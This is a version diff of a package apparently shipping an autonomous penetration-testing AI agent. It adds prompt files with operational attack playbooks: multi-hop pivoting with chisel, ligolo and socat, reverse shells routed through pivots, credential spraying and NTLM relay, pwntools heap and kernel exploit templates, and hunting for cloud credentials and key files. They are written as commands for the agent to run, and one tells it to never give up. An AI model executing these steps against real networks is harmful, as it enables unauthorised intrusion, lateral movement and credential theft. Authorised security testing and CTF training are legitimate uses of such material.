pentesting 0.56.7 → 0.70.1

package/dist/prompts/techniques/pivoting.md

@@ -0,0 +1,205 @@
+# Pivoting & Multi-Hop Tunneling — Autonomous Guide
+
+> **Cross-ref**: lateral.md (movement), ad-attack.md (AD pivoting), network-svc.md (internal services)
+
+## Core Principle
+
+Pivoting = using a compromised host as a relay to reach previously unreachable network segments.
+The agent on the **outer host** can only reach the **inner network** through a pivot chain.
+
+---
+
+## Pivot Decision Tree
+
+```
+GOT SHELL ON HOST? → Run immediately:
+  ip a / ifconfig          → list interfaces (look for 2+ NICs = pivot candidate)
+  ip route / route -n      → routing table (internal subnets)
+  arp -a                   → visible hosts (discovered via ARP)
+  cat /etc/hosts           → hardcoded internal names
+  netstat -an              → internal listening services
+  ss -tlnp                 → listening ports (Linux)
+
+FOUND INTERNAL SUBNET (e.g. 10.10.100.0/24)?
+  → Port scan via pivot: nmap through socks proxy or chisel
+  → Identify services → exploit from outer agent via tunnel
+
+FOUND INTERNAL HOST NAMES?
+  → DNS resolution from pivot: dig @internal-DNS hostname
+  → Look for: DC, DB, git, admin, intranet, mail
+```
+
+---
+
+## Method 1: SSH Tunneling (if SSH available on pivot)
+
+```
+LOCAL PORT FORWARD — access pivot's localhost from attacker:
+  ssh -L 8080:127.0.0.1:80 user@PIVOT
+  → Now: http://localhost:8080 = http://PIVOT:80
+
+REMOTE PORT FORWARD — expose attacker port through pivot:
+  ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT
+  → From PIVOT: nc attacker 4444 reaches attacker's local 4444
+
+DYNAMIC SOCKS PROXY — route arbitrary traffic through pivot:
+  ssh -D 1080 user@PIVOT
+  → proxychains / nmap --proxies socks4://127.0.0.1:1080 INTERNAL_TARGET
+
+MULTI-HOP (3 hops):
+  ssh -J user@HOP1,user@HOP2 user@FINAL_TARGET
+  ssh -L 8080:INTERNAL:80 -J user@HOP1 user@HOP2
+```
+
+---
+
+## Method 2: Chisel (No SSH Required — TCP over HTTP)
+
+```
+ATTACKER SIDE (server):
+  chisel server --port 8080 --reverse
+
+PIVOT SIDE (client — upload chisel binary):
+  chisel client ATTACKER:8080 R:socks        → SOCKS5 on attacker:1080
+  chisel client ATTACKER:8080 R:4444:10.10.100.5:22  → forward specific port
+
+MULTI-HOP chisel:
+  HOP1 connects to attacker → SOCKS on attacker:1080
+  HOP2 connects to HOP1 via proxychains → SOCKS chain
+
+USAGE with proxychains:
+  echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
+  proxychains nmap -sT -Pn -p 22,80,443,445,3389 10.10.100.0/24
+  proxychains evil-winrm -i 10.10.100.5 -u admin -p pass
+```
+
+---
+
+## Method 3: Ligolo-ng (Kernel TUN — fastest, cleanest)
+
+```
+ATTACKER (proxy):
+  sudo ip tuntap add user $USER mode tun ligolo
+  sudo ip link set ligolo up
+  ./proxy -selfcert
+
+PIVOT (agent — upload binary):
+  ./agent -connect ATTACKER:11601 -ignore-cert
+
+ATTACKER — after agent connects:
+  session → select agent
+  listener_add --addr 0.0.0.0:1234 --to 10.10.100.5:22  → port forward
+  start → add route: sudo ip route add 10.10.100.0/24 dev ligolo
+  → Now: ssh admin@10.10.100.5 directly (no proxychains!)
+
+MULTI-HOP with ligolo:
+  Agent on HOP1 → reach HOP2 network
+  Upload agent to HOP2 → connect through ligolo listener on HOP1
+  web_search("ligolo-ng double pivot setup multi-hop")
+```
+
+---
+
+## Method 4: Metasploit Route / SOCKS
+
+```
+meterpreter session on pivot:
+  background
+  use post/multi/manage/autoroute
+  set SESSION 1 → run
+
+Then:
+  use auxiliary/server/socks_proxy → set VERSION 5 → run
+  → proxychains through Metasploit SOCKS on 127.0.0.1:1080
+
+portfwd in meterpreter:
+  portfwd add -l 3389 -p 3389 -r INTERNAL_HOST
+  → rdesktop localhost:3389
+```
+
+---
+
+## Method 5: Netcat / Socat Relay (No binary upload — abuse existing tools)
+
+```
+NETCAT RELAY (if mkfifo available):
+  mkfifo /tmp/pipe
+  nc -l -p 4444 < /tmp/pipe | nc INTERNAL_TARGET 22 > /tmp/pipe
+
+SOCAT RELAY:
+  socat TCP-LISTEN:4444,fork TCP:INTERNAL_TARGET:22
+  → Persistent relay: socat TCP-LISTEN:4444,fork,reuseaddr TCP:TARGET:22
+
+SOCAT SOCKS PROXY (if socat version supports it):
+  socat TCP-LISTEN:1080,fork SOCKS4A:localhost:INTERNAL_HOST:PORT,socksport=1080
+```
+
+---
+
+## Internal Network Scanning via Pivot
+
+```
+VIA PROXYCHAINS (any pivot method):
+  proxychains nmap -sT -Pn -p 22,80,443,445,1433,3306,3389,5985,6379,8080 INTERNAL/24
+  proxychains nmap -sT -Pn --top-ports 100 INTERNAL/24
+
+BASH PING SWEEP (when no tools):
+  for i in $(seq 1 254); do ping -c1 -W1 10.10.100.$i &>/dev/null && echo "10.10.100.$i UP"; done
+
+BASH PORT SCAN (when no tools):
+  for port in 22 80 443 445 3389 5985; do
+    (echo >/dev/tcp/10.10.100.5/$port) 2>/dev/null && echo "$port OPEN"
+  done
+```
+
+---
+
+## Reverse Shell Through Pivot
+
+```
+DOUBLE PIVOT — get shell from deep internal host back to outside:
+
+Method A: Chisel reverse
+  Outer SOCKS → proxychains + outer listener
+  Inner host connects outbound (if egress allowed): 
+    chisel client ATTACKER:8080 R:4445:127.0.0.1:4445
+
+Method B: Meterpreter bind shell
+  proxychains exploit/multi/handler (PAYLOAD: bind_tcp on INTERNAL_HOST)
+  lhost=INTERNAL_HOST → proxychains connect inbound
+
+Method C: SSH -R through existing session
+  From inner host: ssh -R 9001:127.0.0.1:9001 pivot_user@PIVOT
+  From attacker: nc PIVOT:9001
+
+Reverse shell via proxy (if internal host has egress):
+  → Set attacker IP as destination (should reach PIVOT, then routed back)
+  → Verify connectivity: proxychains curl http://ATTACKER:8080/test
+```
+
+---
+
+## Credential Spray Across Pivoted Networks
+
+```
+Once you have credentials from the outer network → always spray internally:
+  proxychains crackmapexec smb 10.10.100.0/24 -u user -p pass --continue-on-success
+  proxychains crackmapexec winrm 10.10.100.0/24 -u user -p pass
+  proxychains impacket-psexec DOMAIN/user:pass@INTERNAL_HOST
+
+Credential relay internally:
+  proxychains impacket-ntlmrelayx -t INTERNAL_TARGET -smb2support
+  Coerce auth from pivot: PetitPotam, PrinterBug, MS-RPRN
+```
+
+---
+
+## Search Patterns
+
+```
+web_search("chisel multi-hop pivot {year}")
+web_search("ligolo-ng double pivot internal network")
+web_search("proxychains nmap internal network scanning")
+web_search("pivot {OS} tunneling no binary upload")
+web_search("reverse shell through pivot NAT traversal")
+```

package/dist/prompts/techniques/privesc.md

@@ -1,5 +1,9 @@
 # Privilege Escalation — Comprehensive Autonomous Guide
 
+> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
+> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
+> to decide what to test and in what order. Adapt dynamically — not to this list.
+
 > **Cross-ref**: shells.md (shell access), post.md (post-exploitation), lateral.md (lateral movement)
 
 ##  Core Principle

package/dist/prompts/techniques/pwn.md

@@ -1,5 +1,9 @@
 # Binary Exploitation (Pwn) — Comprehensive CTF Guide
 
+> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
+> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
+> to decide what to test and in what order. Adapt dynamically — not to this list.
+
 > **Cross-ref**: exploit.md (shell strategy), evasion.md (bypass), shells.md (shell types)
 
 ## Phase 0: Recon — Identify Protections
@@ -258,9 +262,54 @@ House Techniques (Named Patterns):
 ├── House of Orange → forge unsorted bin chunk from top chunk
 ├── House of Botcake → tcache + unsorted bin overlap (2.31+)
 ├── House of Pig → largebin + tcache stashing → arbitrary write
-├── House of Banana → rtld_global abuse for exit-time RCE
-├── House of Kiwi → _IO_FILE vtable abuse (2.35+)
-└── house of XXX → web_search("house of XXX heap exploitation")
+│
+├── House of Banana (glibc 2.35+ — exit-time RCE via rtld_global):
+│   ├── Prerequisite: heap write primitive + libc/ld-linux base leak
+│   ├── Target: _rtld_global (ld.so global) → _dl_audit chain
+│   ├── Attack path:
+│   │   ├── 1. Leak ld.so base (via libc → _rtld_global symbol offset)
+│   │   │      ld_base = libc.address + libc.symbols['_rtld_global'] - ld.symbols['_rtld_global']
+│   │   ├── 2. Locate: _rtld_global._dl_ns[0]._ns_loaded → link_map ptr
+│   │   ├── 3. In link_map: l_audit_any_plt / l_auditing fields
+│   │   ├── 4. Forge fake link_map on heap:
+│   │   │      fake_lm = flat({0x28: heap_base + fake_lm_offset})  # l_next
+│   │   │      # at offset 0x340: pointer to fake audit struct
+│   │   ├── 5. Fake audit struct: ae_funcptr → system or one_gadget
+│   │   ├── 6. Trigger: call exit() or return from main → _dl_audit_preinit fires
+│   │   └── Template:
+│   │       from pwn import *
+│   │       # After leaks:
+│   │       rtld_global = ld.sym['_rtld_global']
+│   │       dl_ns = rtld_global                  # _dl_ns[0] at offset 0
+│   │       ns_loaded = dl_ns                    # _ns_loaded is first field
+│   │       # Write fake link_map → audit struct → funcptr = system
+│   │       # Details vary per binary — confirm struct offsets with gdb:
+│   │       # gdb: p &_rtld_global._dl_ns[0]._ns_loaded
+│   └── web_search("house of banana glibc 2.35 exploit script site:github.com")
+│
+├── House of Kiwi (glibc 2.35+ — _IO_FILE vtable abuse without __free_hook):
+│   ├── Context: glibc 2.24+ removed __free_hook/__malloc_hook; vtable check added
+│   ├── Bypass: _IO_obstack_jumps / _IO_cookie_jumps are NOT checked (whitelisted)
+│   ├── Attack path A — _IO_flush via exit():
+│   │   ├── 1. Overwrite _IO_helper_jumps vtable (in _IO_obstack_jumps range)
+│   │   ├── 2. Corrupt _IO_2_1_stderr_ → vtable → _IO_obstack_jumps + offset
+│   │   ├── 3. Set wide_data / Bckp_base pointers → control RIP
+│   │   └── Trigger: fflush(stderr) or exit() → _IO_flush_all_lockp fires
+│   ├── Attack path B — _IO_cookie_write:
+│   │   ├── 1. Forge _IO_cookie_file struct on heap
+│   │   ├── 2. Set __io_functions.write = system (after pointer mangling)
+│   │   │      # glibc 2.32+ mangles fn ptr: stored = (fn >> 17) | (fn << 47) ^ key
+│   │   │      # key is at fs:0x30; leak it or use partial overwrite
+│   │   ├── 3. Trigger fwrite() to the fake cookie → write callback fires
+│   │   └── python:
+│   │       mangled = ror(system ^ cookie_key, 17, 64)   # pwntools ror()
+│   ├── Pointer mangling (glibc 2.32+ IMPORTANT):
+│   │   ├── Function pointers in _IO structs are XOR-rotated before storage
+│   │   ├── Leak the key: read fs:0x30 (TLS pointer), or partial-overwrite
+│   │   └── Formula: stored = ROR64((fn ^ key), 17)  → reverse: fn = ROL64(stored,17) ^ key
+│   └── web_search("house of kiwi IO_FILE vtable bypass glibc 2.35")
+│
+└── house of XXX → web_search("house of XXX heap exploitation site:github.com")
 
 ═══════════════════════════════════════
 Debugging heap with gdb:
@@ -409,3 +458,138 @@ Vulnerability → Exploitation Flow:
 ├── SUID binary           → exploit → get that user's privileges
 └── Server binary on port → connect and exploit live
 ```
+
+## Kernel Exploitation — Deep Dive (Advanced Level)
+
+```
+KERNEL SETUP & ENVIRONMENT:
+├── Extract fs:    binwalk -e bzImage / extract-vmlinux bzImage
+├── Run CTF qemu: qemu-system-x86_64 -kernel bzImage -initrd rootfs.cpio.gz
+│                 -append "console=ttyS0 nokaslr" -m 128M -nographic
+├── Debug:        qemu + -s -S → gdb vmlinux → target remote :1234
+├── Extract rootfs: mkdir rootfs && cd rootfs && cpio -idmv < ../rootfs.cpio.gz
+├── Patch init to run as root / add your exploit binary
+└── Repack: find . | cpio -H newc -o --owner root:root | gzip > rootfs.cpio.gz
+
+KERNEL PROTECTIONS:
+├── KASLR:   base randomized → need kernel address leak
+│   leaks: syslog (if dmesg allowed), /proc/kallsyms (if readable)
+│         spray addresses, or use physmap (when mmap_min_addr=0)
+├── SMEP:    can't execute userspace pages in kernel mode → kernel ROP only
+│   bypass: disable SMEP (clear bit 20 in CR4) via kernel gadget
+├── SMAP:    can't access userspace memory in kernel mode
+│   bypass: disable SMAP (clear bit 21 in CR4) or use copy_from/to_user
+├── KPTI:    separate page tables for user/kernel → flush on context switch
+│   exploit: use KPTI trampoline swapgs_restore_regs_and_return_to_usermode
+│            (symbol in /proc/kallsyms or calculate from vmlinux)
+└── Stack Canary: same as user-space, leaked via info disclosure
+
+KERNEL ROP CHAIN — ret2usr (when SMEP disabled):
+├── Control RIP via kernel overflow
+├── ROP: disable SMEP/SMAP → call userspace function pointer
+│   mov cr4, <value_without_smep> ; ret
+├── Userspace shellcode:
+│   void shell() {
+│       commit_creds(prepare_kernel_cred(NULL));  // root creds
+│       // return to userspace:
+│       asm("swapgs; iretq");
+│   }
+└── Restore context: need original rip/cs/rflags/rsp/ss saved before exploit
+
+COMMIT_CREDS PATTERN:
+├── commit_creds(prepare_kernel_cred(NULL)) → uid/gid = 0
+├── Addresses: grep in /proc/kallsyms (if readable) or vmlinux offsets
+├── Kernel ROP: pop rdi; ret → 0 → prepare_kernel_cred → pop rdi; ret →
+│              rax (result) → commit_creds → recover_to_userspace
+└── After root: execve("/bin/sh") or system command
+
+MODPROBE_PATH OVERWRITE (powerful, no SMEP bypass needed):
+├── When: have arbitrary kernel write primitive
+├── Steps:
+│   1. Overwrite modprobe_path (/sbin/modprobe) with /tmp/pwn script
+│   2. /tmp/pwn: #!/bin/sh\n cp /flag /tmp/flag && chmod 777 /tmp/flag
+│   3. Execute unknown file format → kernel calls modprobe_path
+│      echo -ne '\xff\xff\xff\xff' > /tmp/bad; chmod +x /tmp/bad; /tmp/bad
+│   4. /tmp/flag now readable
+└── Works even without executing shellcode (bypasses SMEP/NX)
+
+KERNEL UAF → FUNCTION POINTER OVERWRITE:
+├── Typical flow:
+│   1. Allocate kernel object via ioctl / socket / open
+│   2. Free it (without destroying reference)
+│   3. Spray heap with controlled data (reclaim freed slot)
+│   4. Original pointer now points to attacker-controlled struct
+│   5. Function pointer called → code execution
+├── Heap spray: open many /proc or socket fds, read/send data
+└── Object size: match target struct size for reliable reclaim
+
+KERNEL RACE CONDITIONS (TOCTOU):
+├── Double-fetch: kernel reads userspace value twice, race between reads
+├── Concurrent ioctl/syscall: race window between check and use
+├── Exploitation: spin up threads, hammer concurrent syscalls
+├── Tools: race_condition keyword, userfaultfd for precise racing
+└── web_search("kernel TOCTOU exploit userfaultfd technique")
+
+USEFUL KERNEL PRIMITIVES:
+├── Arbitrary read:  copy_from_user leak, info leak via syslog/proc
+├── Arbitrary write: kmalloc + controlled content + overflow/UAF
+├── Heap spray:      open many /proc/self/mem, msg_msg (msgsnd), pipe buffers
+├── msg_msg:         sendmsg to reclaim freed kernel object (kmalloc-N sized)
+└── setxattr:        arbitrary kernel heap write (controllable size + content)
+```
+
+## ROP Deep Patterns (Advanced)
+
+```
+RET2DLRESOLVE — No libc file needed:
+from pwn import *
+elf = ELF('./binary')
+rop = ROP(elf)
+dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])
+rop.read(0, dlresolve.data_addr)  # write the fake structures
+rop.ret2dlresolve(dlresolve)
+# send: padding + rop.chain() + then dlresolve.payload
+
+BLIND ROP (BROP) — No binary, only crash/non-crash:
+├── Goal: exploit a stack overflow with only socket feedback
+├── Step 1: Find overflow offset (binary search on payload length)
+├── Step 2: Find "stop gadget" (causes infinite loop, keeps connection)
+├── Step 3: Blindly probe for ROP gadgets (brop gadget is canonical)
+│   ├── BROP gadget: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
+│   └── Dump PLT entries to find puts → dump binary from memory
+├── Step 4: Leak binary via puts over socket
+├── Step 5: Standard ROP exploit from dumped binary
+└── web_search("blind rop brop exploit tutorial")
+
+STACK PIVOT (when controlled buffer too small for full ROP):
+├── Gadget: xchg rsp, rax / leave; ret / pop rsp; ret
+├── Target: large controlled buffer (heap, data section, mmap)
+├── build full ROP chain there → pivot RSP to it
+└── Common: fake frame on heap → leave; ret pivots there
+
+SIGROP / SROP in depth:
+├── Abuses sigreturn syscall (15 on x86_64) to set ALL registers
+├── syscall; ret  →  rax=15 → sigreturn → kernel restores all regs from stack frame
+├── Full SigreturnFrame:
+│   frame = SigreturnFrame()
+│   frame.rip = execve_syscall_addr   # or any gadget
+│   frame.rsp = rsp                   # controlled stack
+│   frame.rax = 59                    # SYS_execve
+│   frame.rdi = binsh_addr
+│   frame.rsi = frame.rdx = 0
+├── Useful when: very few gadgets, only syscall; ret available
+└── orw shellcode path when execve blocked by seccomp
+
+SECCOMP BYPASS:
+├── Check: seccomp-tools dump ./binary → see allowed syscalls
+│         seccomp-tools asm → assemble BPF filters
+├── Common CTF: execve blocked → use open+read+write (ORW)
+│   fd = open("flag.txt", O_RDONLY)
+│   read(fd, buf, 0x100)
+│   write(1, buf, 0x100)
+├── Shellcraft: shellcraft.open() + shellcraft.read(3,'rsp',100) + shellcraft.write(1,'rsp',100)
+├── Filter bypass: if using 32-bit mode (ptrace SECCOMP allows different arch)
+│   int 0x80 in 64-bit process: uses 32-bit syscall numbers!
+│   open=5 (32-bit) may not be filtered if filter only blocks 64-bit open=2
+└── web_search("seccomp bypass technique {year} CTF")
+```

package/dist/prompts/techniques/shells.md

@@ -1,5 +1,9 @@
 # Shell Operations — Comprehensive Autonomous Guide
 
+> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
+> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
+> to decide what to test and in what order. Adapt dynamically — not to this list.
+
 > **Cross-ref**: exploit.md (initial access), post.md (post-exploitation), lateral.md (pivoting)
 
 ##  Core Principle

package/dist/prompts/zero-day.md

@@ -170,3 +170,128 @@ DISCOVERY → SEARCH → ATTACK → ADAPT → CHAIN → PIVOT → REPEAT
 NEVER give up. ALWAYS search. The answer exists on the internet.
 web_search("how to exploit {specific_thing_you_discovered}")
 ```
+
+## 🎯 Phase C: DEF CON / Enterprise Level
+
+### C1: Fuzzing Loop — Write, Compile, Fuzz, Analyze
+```
+When dealing with compiled targets or custom protocols:
+
+AFL++ / LibFuzzer Loop:
+1. write_file("fuzz_target.c", harness_code)
+   - Harness: reads from stdin → passes to target function
+   - Prototype: int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
+2. run_cmd("AFL_USE_ASAN=1 afl-cc -o fuzz_target fuzz_target.c -fsanitize=address")
+3. run_cmd("afl-fuzz -i seed_corpus/ -o findings/ -- ./fuzz_target @@")
+4. Monitor: run_cmd("afl-whatsup findings/")  → crash rate, path coverage
+5. Triage: run_cmd("afl-cmin -i findings/ -o min/ -- ./fuzz_target @@")
+6. Analyze: for crash in findings/crashes/*; do
+              ASAN_OPTIONS=symbolize=1 ./fuzz_target $crash
+            done
+7. Root cause → write exploit
+
+Network Fuzzer (custom protocol):
+write_file("fuzzer.py", """
+import socket, itertools, random
+def mutate(data):  # bit flip, byte replace, insert/delete
+    ...
+for payload in corpus:
+    s = socket.connect(HOST, PORT)
+    s.send(mutate(payload))
+    response = s.recv(1024)
+    if unusual(response):  log(payload, response)
+""")
+run_cmd("python3 fuzzer.py")
+
+web_search("AFL++ tutorial custom protocol fuzzing {year}")
+web_search("libfuzzer harness writing guide {binary_type}")
+```
+
+### C2: Patch Diffing → N-Day/1-Day Exploitation
+```
+When target is slightly behind on patches:
+
+1. Identify version: banner, file metadata, build strings
+2. Find next patched version:
+   web_search("{software} {version} → {next_version} security changelog")
+   web_search("{software} CVE {year} patch commit")
+3. If open source → diff:
+   git clone {repo}
+   git diff v{old_version} v{new_version} -- {likely_vuln_files}
+   → Look for: bounds checks added, condition added before dangerous call
+4. Understand the vulnerability class from the diff
+5. Craft exploit targeting the exact unfixed version
+6. Test locally with same version → adapt to remote
+
+Patch diffing tools:
+├── bindiff (IDA plugin): binary-level diff between versions
+├── diaphora (free alternative): similar to bindiff
+├── patchdiff2: older but works
+└── web_search("bindiff tutorial patch diffing binary exploitation")
+```
+
+### C3: Variant Hunting — Known Bug Class, Unknown Instances
+```
+Once you find ONE vulnerability, hunt for variants:
+
+Source code search:
+grep -rn "same_dangerous_pattern" src/
+grep -rn "similar_function_name" --include="*.c" .
+
+Binary variant hunting:
+├── If SQLi here → test ALL similar parameters in ALL endpoints
+├── If UAF in module A → check module B's dealloc order
+├── If path traversal in /upload → test /backup, /export, /download
+
+IDOR/Logic flaw variants:
+├── Found IDOR on id= → test: user_id= order_id= doc_id= ref= token=
+├── Found admin bypass via X-Role header → test ALL other privilege endpoints
+└── Found TOCTOU in open() → check other syscall pairs: stat()+open(), lstat()+open()
+
+Automated variant search:
+write_file("variant_hunter.py", """
+import requests
+ENDPOINTS = ['/api/v1/user', '/api/v1/order', '/api/v2/...']
+PAYLOADS = [...]  # from original finding
+for ep in ENDPOINTS:
+    for p in PAYLOADS:
+        r = requests.get(f'BASE_URL{ep}', params=p)
+        if r.status_code != 403:
+            print(f'POTENTIAL: {ep} {p} → {r.status_code}')
+""")
+```
+
+### C4: Enterprise Internal Network
+```
+Initial foothold → internal network playbook:
+
+SEGMENT DISCOVERY:
+├── ip route + arp -a + netstat → map known segments
+├── Scan adjacent /24 blocks: nmap -sn 10.{1..20}.0.0/24
+├── DNS enumeration: for i in $(seq 1 254); do host 10.x.x.$i; done
+└── SNMP sweep: onesixtyone -c community.txt -i targets.txt
+
+CRITICAL INTERNAL SERVICES TO FIND:
+├── Active Directory DC:   88/TCP (Kerberos), 389/389 (LDAP), 636 (LDAPS)
+├── SCCM/WSUS:             8530/HTTP → privilege escalation paths
+├── Exchange/Mail:         25/443 → phishing from internal, relay attacks
+├── Corporate CA:          80 (web enrollment) → ADCS attacks
+├── Jump hosts/bastion:    SSH/RDP → lateral movement hub
+├── Prod databases:        1433/3306/5432 → credential reuse + data dump
+├── DevOps infra:          8080(Jenkins)/9090(Prometheus)/9000(SonarQube)
+│                          → often weak auth → code execution
+└── Cloud endpoints:       169.254.169.254 (AWS/Azure metadata) → IAM creds
+
+AD FOREST ATTACKS:
+├── Forest trust → SID history → Enterprise Admin across forests
+├── External trusts → kerberoast across trust → crack → access other domain
+└── web_search("active directory forest trust attack SID filtering bypass {year}")
+
+CLOUD PIVOT (when enterprise uses hybrid):
+├── From on-prem → find AWS/Azure creds in env vars, files, secrets managers
+│   env | grep -i aws/azure/gcp/secret
+│   find / -name "*.env" -o -name "credentials" -o -name "*.pem" 2>/dev/null
+├── AWS: aws sts get-caller-identity → role → escalate via misconfigured policies
+├── Azure: az account list → subscriptions → VMs → managed identity → creds
+└── web_search("cloud privilege escalation {provider} misconfiguration {year}")
+```

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "pentesting",
-  "version": "0.56.7",
+  "version": "0.70.1",
   "description": "Autonomous Penetration Testing AI Agent",
   "type": "module",
   "main": "dist/main.js",
@@ -19,7 +19,7 @@
     "dev:tsx": "tsx src/platform/tui/main.tsx",
     "build": "tsup",
     "start": "node dist/main.js",
-    "test": "mkdir -p .vitest && TMPDIR=.vitest vitest run && rm -rf .vitest .pentesting",
+    "test": "mkdir -p .vitest && TMPDIR=.vitest npx vitest run && rm -rf .vitest .pentesting",
     "test:watch": "vitest",
     "lint": "tsc --noEmit",
     "prepublishOnly": "npm run build",